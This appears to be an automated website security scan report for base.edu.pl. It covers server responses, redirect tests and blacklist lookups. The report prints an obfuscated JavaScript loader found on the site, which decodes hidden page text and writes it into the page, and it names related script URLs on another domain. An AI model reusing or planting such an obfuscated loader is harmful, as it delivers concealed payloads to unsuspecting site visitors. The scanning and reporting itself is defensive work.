Scanned pages/files
Request | Server response | Status |
http://base.edu.pl/ | 200 OK Content-Length: 3363 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
var AFD3E3D9E3C678958BC3 = -86+96;var A200312354ECA26EB9EF = document.getElementById('c26B14DD9C95ED1B8F3550C').innerHTML;var c26e34eb22A0C0FCBDDE666DD05690 = new String;A200312354ECA26EB9EF = A200312354ECA26EB9EF.substr(4,531);for(i=0;i<A200312354ECA26EB9EF.length;i++) c26e34eb22A0C0FCBDDE666DD05690 += String.fromCharCode(A200312354ECA26EB9EF.substr(i,1).charCodeAt()-AFD3E3D9E3C678958BC3);document.write(c26e34eb22A0C0FCBDDE666DD05690);
Antivirus reports:
http://jpchase.cn/js.js | 500 Can't connect to jpchase.cn:80 (Bad hostname) Content-Length: 152 Content-Type: text/plain | clean |
http://jpchase.cn/test404page.js | 500 Can't connect to jpchase.cn:80 (Bad hostname) Content-Length: 152 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: base.edu.pl
Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 07:52:23 GMT
Server: IdeaWebServer/v0.80
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: base.edu.pl
Referer: http://www.google.com/search?q=base.edu.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=base.edu.pl
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://base.edu.pl/
Result: base.edu.pl is not infected or malware details are not published yet.